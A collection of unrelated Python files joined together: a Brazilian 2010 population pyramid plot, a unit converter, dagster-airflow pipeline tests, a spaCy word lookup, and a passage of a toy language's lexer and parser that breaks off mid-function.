"60 a 64 anos", "65 a 69 anos", "70 a 74 anos", "75 a 79 anos", "80 a 84 anos", "85 a 89 anos",
"90 a 94 anos", "95 a 99 anos", "100 anos e mais"])
feminino = np.array([6779171, 7345231, 8441348, 8432004, 8614963, 8643419, 8026854, 7121915, 6688796, 6141338, 5305407,
4373877, 3468085, 2616745, 2074264, 1472930, 998349, 508724, 211594, 66806, 16989])
masculino = np.array([7016987, 7624144, 8725413, 8558868, 8630229, 8460995, 7717658, 6766664, 6320568, 5692014, 4834995,
3902344, 3041035, 2224065, 1667372, 1090517, 668623, 310759, 114964, 31529, 7247])
pop = [x for x in range( len(idade) ) ]
# Chart configuration
plt.figure(figsize=(10, 8))
plt.suptitle('Distribuição da População por sexo segundo os grupos de idade – Brasil – 2010', fontsize=18)
plt.rc('axes.spines', **{'bottom': True, 'left': False, 'right': False, 'top': False})  # remove the figure spines
# Male subplot
plt.subplot(221)
plt.barh(idade, masculino, align='center', color='blue', linewidth=0.5, label='Masculino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["", "", "4000000", "", ""])
plt.legend(loc='upper left')  # legend
plt.subplots_adjust(left=0.15, wspace=0.4)  # add space between the subplots
plt.gca().invert_xaxis()  # mirror the male side of the pyramid
plt.yticks([])  # hide the y-axis labels
# faint reference lines
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.20)
# Female subplot
plt.subplot(222)
plt.barh(idade, feminino, align='center', color='orange', linewidth=0.5, label='Feminino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["0", "", "4000000", "", ""])
plt.legend(loc='upper right')  # legend
# faint reference lines
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.30)
plt.show()
|
metros = int(input("uma distância em metro: "))
print("A medida de {}m corresponde a".format(metros))
print("{}km".format(metros/1000))
print("{}hm".format(metros/100))
print("{}dam".format(metros/10))
print("{}dm".format(metros*10))
print("{}cm".format(metros*100))
print("{}mm".format(metros*1000))
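# Worked example (sketch): for an input of 500 metros the conversions printed
# above are 0.5km, 5.0hm, 50.0dam, 5000dm, 50000cm and 500000mm.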
|
from __future__ import unicode_literals
import os
import uuid
from airflow.exceptions import AirflowSkipException
from dagster_airflow.factory import AIRFLOW_MAX_DAG_NAME_LEN, _rename_for_airflow
from dagster_airflow.test_fixtures import ( # pylint: disable=unused-import
dagster_airflow_docker_operator_pipeline,
dagster_airflow_k8s_operator_pipeline,
dagster_airflow_python_operator_pipeline,
)
from dagster_airflow_tests.conftest import IMAGE
from dagster_airflow_tests.marks import nettest
from dagster import ExecutionTargetHandle
from dagster.core.events.log import DagsterEventRecord
from dagster.utils import script_relative_path
AIRFLOW_DEMO_EVENTS = {
('ENGINE_EVENT', None),
('STEP_START', 'multiply_the_word.compute'),
('STEP_INPUT', 'multiply_the_word.compute'),
('STEP_OUTPUT', 'multiply_the_word.compute'),
('OBJECT_STORE_OPERATION', 'multiply_the_word.compute'),
('STEP_SUCCESS', 'multiply_the_word.compute'),
('STEP_START', 'count_letters.compute'),
('OBJECT_STORE_OPERATION', 'count_letters.compute'),
('STEP_INPUT', 'count_letters.compute'),
('STEP_OUTPUT', 'count_letters.compute'),
('STEP_SUCCESS', 'count_letters.compute'),
}
ENVIRONMENTS_PATH = script_relative_path(
os.path.join(
'..',
'..',
'..',
'.buildkite',
'images',
'docker',
'test_project',
'test_pipelines',
'environments',
)
)
def validate_pipeline_execution(pipeline_exc_result):
seen_events = set()
for result in pipeline_exc_result.values():
for event in result:
if isinstance(event, DagsterEventRecord):
seen_events.add((event.dagster_event.event_type_value, event.step_key))
else:
seen_events.add((event.event_type_value, event.step_key))
assert seen_events == AIRFLOW_DEMO_EVENTS
class TestExecuteDagPythonFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagKubernetizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
class TestExecuteDagKubernetizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
def test_rename_for_airflow():
pairs = [
('foo', 'foo'),
('this-is-valid', 'this-is-valid'),
(
'a' * AIRFLOW_MAX_DAG_NAME_LEN + 'very long strings are disallowed',
'a' * AIRFLOW_MAX_DAG_NAME_LEN,
),
('a name with illegal spaces', 'a_name_with_illegal_spaces'),
('a#name$with@special*chars!!!', 'a_name_with_special_chars___'),
]
for before, after in pairs:
assert after == _rename_for_airflow(before)
def validate_skip_pipeline_execution(result):
expected_airflow_task_states = {
('foo', False),
('first_consumer', False),
('second_consumer', True),
('third_consumer', True),
}
seen = {(ti.task_id, isinstance(value, AirflowSkipException)) for ti, value in result.items()}
assert seen == expected_airflow_task_states
class TestExecuteSkipsPythonOperator(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteSkipsContainerized(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_docker_operator_pipeline)
|
from .elf import Corpus
from .base import CorpusBase, JsonCorpus, JsonCorpusLoader
|
import json
import re
import spacy
import enchant
import copy as cp
sp = spacy.load('en_core_web_sm')
def lemmatize_this(str_word):
return sp(str_word)[0]
def main():
while True:
print("Ingrese la Palabra: ")
word = input()
word = str(lemmatize_this(word))
try:
with open("../Datos/06_words_fixed/stg0/" + word + ".json", "r") as answerJson:
wordDic = json.load(answerJson)
elems = [[k, v] for k, v in wordDic.items()]
elems.sort(key = lambda x: x[1])
rank = len(elems)
for i in elems:
print(rank, i)
rank -=1
except:
print("Palabra no encontrada")
if __name__ == "__main__":
main()
|
#######################################
# IMPORTS
#######################################
from strings_with_arrows import *
import string
#######################################
# CONSTANTS
#######################################
DIGITS = '0123456789'
LETTERS = string.ascii_letters
LETTERS_DIGITS = LETTERS + DIGITS
#######################################
# ERRORS
#######################################
class Error:
def __init__(self, pos_start, pos_end, error_name, details):
self.pos_start = pos_start
self.pos_end = pos_end
self.error_name = error_name
self.details = details
def as_string(self):
result = f'{self.error_name}: {self.details}\n'
result += f'File {self.pos_start.fn}, line {self.pos_start.ln + 1}'
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
class IllegalCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(pos_start, pos_end, 'Illegal Character', details)
class ExpectedCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(pos_start, pos_end, 'Expected Character', details)
class InvalidSyntaxError(Error):
def __init__(self, pos_start, pos_end, details=''):
super().__init__(pos_start, pos_end, 'Invalid Syntax', details)
class RTError(Error):
def __init__(self, pos_start, pos_end, details, context):
super().__init__(pos_start, pos_end, 'Runtime Error', details)
self.context = context
def as_string(self):
result = self.generate_traceback()
result += f'{self.error_name}: {self.details}'
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
def generate_traceback(self):
result = ''
pos = self.pos_start
ctx = self.context
while ctx:
result = f' File {pos.fn}, line {str(pos.ln + 1)}, in {ctx.display_name}\n' + result
pos = ctx.parent_entry_pos
ctx = ctx.parent
return 'Traceback (most recent call last):\n' + result
#######################################
# POSITION
#######################################
class Position:
def __init__(self, idx, ln, col, fn, ftxt):
self.idx = idx
self.ln = ln
self.col = col
self.fn = fn
self.ftxt = ftxt
def advance(self, current_char=None):
self.idx += 1
self.col += 1
if current_char == '\n':
self.ln += 1
self.col = 0
return self
def copy(self):
return Position(self.idx, self.ln, self.col, self.fn, self.ftxt)
#######################################
# TOKENS
#######################################
TT_INT = 'INT'
TT_FLOAT = 'FLOAT'
TT_IDENTIFIER = 'IDENTIFIER'
TT_KEYWORD = 'KEYWORD'
TT_PLUS = 'PLUS'
TT_MINUS = 'MINUS'
TT_MUL = 'MUL'
TT_DIV = 'DIV'
TT_POW = 'POW'
TT_EQ = 'EQ'
TT_LPAREN = 'LPAREN'
TT_RPAREN = 'RPAREN'
TT_EE = 'EE'
TT_NE = 'NE'
TT_LT = 'LT'
TT_GT = 'GT'
TT_LTE = 'LTE'
TT_GTE = 'GTE'
TT_COMMA = 'COMMA'
TT_ARROW = 'ARROW'
TT_EOF = 'EOF'
KEYWORDS = [
'VAR',
'AND',
'OR',
'NOT',
'IF',
'ELIF',
'ELSE',
'FOR',
'TO',
'STEP',
'WHILE',
'FUN',
'THEN'
]
class Token:
def __init__(self, type_, value=None, pos_start=None, pos_end=None):
self.type = type_
self.value = value
if pos_start:
self.pos_start = pos_start.copy()
self.pos_end = pos_start.copy()
self.pos_end.advance()
if pos_end:
self.pos_end = pos_end.copy()
def matches(self, type_, value):
return self.type == type_ and self.value == value
def __repr__(self):
if self.value: return f'{self.type}:{self.value}'
return f'{self.type}'
#######################################
# LEXER
#######################################
class Lexer:
def __init__(self, fn, text):
self.fn = fn
self.text = text
self.pos = Position(-1, 0, -1, fn, text)
self.current_char = None
self.advance()
def advance(self):
self.pos.advance(self.current_char)
self.current_char = self.text[self.pos.idx] if self.pos.idx < len(self.text) else None
def make_tokens(self):
tokens = []
while self.current_char != None:
if self.current_char in ' \t':
self.advance()
elif self.current_char in DIGITS:
tokens.append(self.make_number())
elif self.current_char in LETTERS:
tokens.append(self.make_identifier())
elif self.current_char == '+':
tokens.append(Token(TT_PLUS, pos_start=self.pos))
self.advance()
elif self.current_char == '-':
tokens.append(self.make_minus_or_arrow())
elif self.current_char == '*':
tokens.append(Token(TT_MUL, pos_start=self.pos))
self.advance()
elif self.current_char == '/':
tokens.append(Token(TT_DIV, pos_start=self.pos))
self.advance()
elif self.current_char == '^':
tokens.append(Token(TT_POW, pos_start=self.pos))
self.advance()
elif self.current_char == '(':
tokens.append(Token(TT_LPAREN, pos_start=self.pos))
self.advance()
elif self.current_char == ')':
tokens.append(Token(TT_RPAREN, pos_start=self.pos))
self.advance()
elif self.current_char == '!':
token, error = self.make_not_equals()
if error: return [], error
tokens.append(token)
elif self.current_char == '=':
tokens.append(self.make_equals())
elif self.current_char == '<':
tokens.append(self.make_less_than())
elif self.current_char == '>':
tokens.append(self.make_greater_than())
elif self.current_char == ',':
tokens.append(Token(TT_COMMA, pos_start=self.pos))
self.advance()
else:
pos_start = self.pos.copy()
char = self.current_char
self.advance()
return [], IllegalCharError(pos_start, self.pos, "'" + char + "'")
tokens.append(Token(TT_EOF, pos_start=self.pos))
return tokens, None
def make_number(self):
num_str = ''
dot_count = 0
pos_start = self.pos.copy()
while self.current_char != None and self.current_char in DIGITS + '.':
if self.current_char == '.':
if dot_count == 1: break
dot_count += 1
num_str += self.current_char
self.advance()
if dot_count == 0:
return Token(TT_INT, int(num_str), pos_start, self.pos)
else:
return Token(TT_FLOAT, float(num_str), pos_start, self.pos)
def make_identifier(self):
id_str = ''
pos_start = self.pos.copy()
while self.current_char != None and self.current_char in LETTERS_DIGITS + '_':
id_str += self.current_char
self.advance()
tok_type = TT_KEYWORD if id_str in KEYWORDS else TT_IDENTIFIER
return Token(tok_type, id_str, pos_start, self.pos)
def make_minus_or_arrow(self):
tok_type = TT_MINUS
pos_start = self.pos.copy()
self.advance()
if self.current_char == '>':
self.advance()
tok_type = TT_ARROW
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_not_equals(self):
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
return Token(TT_NE, pos_start=pos_start, pos_end=self.pos), None
self.advance()
return None, ExpectedCharError(pos_start, self.pos, "'=' (after '!')")
def make_equals(self):
tok_type = TT_EQ
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_EE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_less_than(self):
tok_type = TT_LT
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_LTE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_greater_than(self):
tok_type = TT_GT
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_GTE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
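# Lexer usage sketch (illustrative only): feeding a small line through
# make_tokens() yields a flat token stream plus an optional error, e.g.
#
#   tokens, error = Lexer('<stdin>', 'VAR x = 1 + 2').make_tokens()
#   # tokens -> [KEYWORD:VAR, IDENTIFIER:x, EQ, INT:1, PLUS, INT:2, EOF]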
#######################################
# NODES
#######################################
class NumberNode:
def __init__(self, tok):
self.tok = tok
self.pos_start = self.tok.pos_start
self.pos_end = self.tok.pos_end
def __repr__(self):
return f'{self.tok}'
class VarAccessNode:
def __init__(self, var_name_tok):
self.var_name_tok = var_name_tok
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.var_name_tok.pos_end
class VarAssignNode:
def __init__(self, var_name_tok, value_node):
self.var_name_tok = var_name_tok
self.value_node = value_node
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.value_node.pos_end
class BinOpNode:
def __init__(self, left_node, op_tok, right_node):
self.left_node = left_node
self.op_tok = op_tok
self.right_node = right_node
self.pos_start = self.left_node.pos_start
self.pos_end = self.right_node.pos_end
def __repr__(self):
return f'({self.left_node}, {self.op_tok}, {self.right_node})'
class UnaryOpNode:
def __init__(self, op_tok, node):
self.op_tok = op_tok
self.node = node
self.pos_start = self.op_tok.pos_start
self.pos_end = node.pos_end
def __repr__(self):
return f'({self.op_tok}, {self.node})'
class IfNode:
def __init__(self, cases, else_case):
self.cases = cases
self.else_case = else_case
self.pos_start = self.cases[0][0].pos_start
self.pos_end = (self.else_case or self.cases[len(self.cases) - 1][0]).pos_end
class ForNode:
def __init__(self, var_name_tok, start_value_node, end_value_node, step_value_node, body_node):
self.var_name_tok = var_name_tok
self.start_value_node = start_value_node
self.end_value_node = end_value_node
self.step_value_node = step_value_node
self.body_node = body_node
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.body_node.pos_end
class WhileNode:
def __init__(self, condition_node, body_node):
self.condition_node = condition_node
self.body_node = body_node
self.pos_start = self.condition_node.pos_start
self.pos_end = self.body_node.pos_end
class FuncDefNode:
def __init__(self, var_name_tok, arg_name_toks, body_node):
self.var_name_tok = var_name_tok
self.arg_name_toks = arg_name_toks
self.body_node = body_node
if self.var_name_tok:
self.pos_start = self.var_name_tok.pos_start
elif len(self.arg_name_toks) > 0:
self.pos_start = self.arg_name_toks[0].pos_start
else:
self.pos_start = self.body_node.pos_start
self.pos_end = self.body_node.pos_end
class CallNode:
def __init__(self, node_to_call, arg_nodes):
self.node_to_call = node_to_call
self.arg_nodes = arg_nodes
self.pos_start = self.node_to_call.pos_start
if len(self.arg_nodes) > 0:
self.pos_end = self.arg_nodes[len(self.arg_nodes) - 1].pos_end
else:
self.pos_end = self.node_to_call.pos_end
#######################################
# PARSE RESULT
#######################################
class ParseResult:
def __init__(self):
self.error = None
self.node = None
self.last_registered_advance_count = 0
self.advance_count = 0
def register_advancement(self):
self.last_registered_advance_count = 1
self.advance_count += 1
def register(self, res):
self.last_registered_advance_count = res.advance_count
self.advance_count += res.advance_count
if res.error: self.error = res.error
return res.node
def success(self, node):
self.node = node
return self
def failure(self, error):
if not self.error or self.last_registered_advance_count == 0:
self.error = error
return self
#######################################
# PARSER
#######################################
class Parser:
def __init__(self, tokens):
self.tokens = tokens
self.tok_idx = -1
self.advance()
def advance(self, ):
self.tok_idx += 1
if self.tok_idx < len(self.tokens):
self.current_tok = self.tokens[self.tok_idx]
return self.current_tok
def parse(self):
res = self.expr()
if not res.error and self.current_tok.type != TT_EOF:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected '+', '-', '*', '/', '^', '==', '!=', '<', '>', '<=', '>=', 'AND' or 'OR'"
))
return res
###################################
def expr(self):
res = ParseResult()
if self.current_tok.matches(TT_KEYWORD, 'VAR'):
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected identifier"
))
var_name = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_EQ:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected '='"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
return res.success(VarAssignNode(var_name, expr))
node = res.register(self.bin_op(self.comp_expr, ((TT_KEYWORD, 'AND'), (TT_KEYWORD, 'OR'))))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected 'VAR', 'IF', 'FOR', 'WHILE', 'FUN', int, float, identifier, '+', '-', '(' or 'NOT'"
))
return res.success(node)
def comp_expr(self):
res = ParseResult()
if self.current_tok.matches(TT_KEYWORD, 'NOT'):
op_tok = self.current_tok
res.register_advancement()
self.advance()
node = res.register(self.comp_expr())
if res.error: return res
return res.success(UnaryOpNode(op_tok, node))
node = res.register(self.bin_op(self.arith_expr, (TT_EE, TT_NE, TT_LT, TT_GT, TT_LTE, TT_GTE)))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected int, float, identifier, '+', '-', '(' or 'NOT'"
))
return res.success(node)
def arith_expr(self):
return self.bin_op(self.term, (TT_PLUS, TT_MINUS))
def term(self):
return self.bin_op(self.factor, (TT_MUL, TT_DIV))
def factor(self):
res = ParseResult()
tok = self.current_tok
if tok.type in (TT_PLUS, TT_MINUS):
res.register_advancement()
self.advance()
factor = res.register(self.factor())
if res.error: return res
return res.success(UnaryOpNode(tok, factor))
return self.power()
def power(self):
return self.bin_op(self.call, (TT_POW, ), self.factor)
def call(self):
res = ParseResult()
atom = res.register(self.atom())
if res.error: return res
if self.current_tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
arg_nodes = []
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
else:
arg_nodes.append(res.register(self.expr()))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')', 'VAR', 'IF', 'FOR', 'WHILE', 'FUN', int, float, identifier, '+', '-', '(' or 'NOT'"
))
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
arg_nodes.append(res.register(self.expr()))
if res.error: return res
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
res.register_advancement()
self.advance()
return res.success(CallNode(atom, arg_nodes))
return res.success(atom)
def atom(self):
res = ParseResult()
tok = self.current_tok
if tok.type in (TT_INT, TT_FLOAT):
res.register_advancement()
self.advance()
return res.success(NumberNode(tok))
elif tok.type == TT_IDENTIFIER:
res.register_advancement()
self.advance()
return res.success(VarAccessNode(tok))
elif tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
return res.success(expr)
else:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')'"
))
elif tok.matches(TT_KEYWORD, 'IF'):
if_expr = res.register(self.if_expr())
if res.error: return res
return res.success(if_expr)
elif tok.matches(TT_KEYWORD, 'FOR'):
for_expr = res.register(self.for_expr())
if res.error: return res
return res.success(for_expr)
elif tok.matches(TT_KEYWORD, 'WHILE'):
while_expr = res.register(self.while_expr())
if res.error: return res
return res.success(while_expr)
elif tok.matches(TT_KEYWORD, 'FUN'):
func_def = res.register(self.func_def())
if res.error: return res
return res.success(func_def)
return res.failure(InvalidSyntaxError(
tok.pos_start, tok.pos_end,
"Expected int, float, identifier, '+', '-', '(', 'IF', 'FOR', 'WHILE', 'FUN'"
))
def if_expr(self):
res = ParseResult()
cases = []
else_case = None
if not self.current_tok.matches(TT_KEYWORD, 'IF'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'IF'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
while self.current_tok.matches(TT_KEYWORD, 'ELIF'):
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
if self.current_tok.matches(TT_KEYWORD, 'ELSE'):
res.register_advancement()
self.advance()
else_case = res.register(self.expr())
if res.error: return res
return res.success(IfNode(cases, else_case))
def for_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FOR'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FOR'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier"
))
var_name = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_EQ:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '='"
))
res.register_advancement()
self.advance()
start_value = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'TO'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'TO'"
))
res.register_advancement()
self.advance()
end_value = res.register(self.expr())
if res.error: return res
if self.current_tok.matches(TT_KEYWORD, 'STEP'):
res.register_advancement()
self.advance()
step_value = res.register(self.expr())
if res.error: return res
else:
step_value = None
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(ForNode(var_name, start_value, end_value, step_value, body))
def while_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'WHILE'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'WHILE'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(WhileNode(condition, body))
def func_def(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FUN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FUN'"
))
res.register_advancement()
self.advance()
if self.current_tok.type == TT_IDENTIFIER:
var_name_tok = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '('"
))
else:
var_name_tok = None
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or '('"
))
res.register_advancement()
self.advance()
arg_name_toks = []
if self.current_tok.type == TT_IDENTIFIER:
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
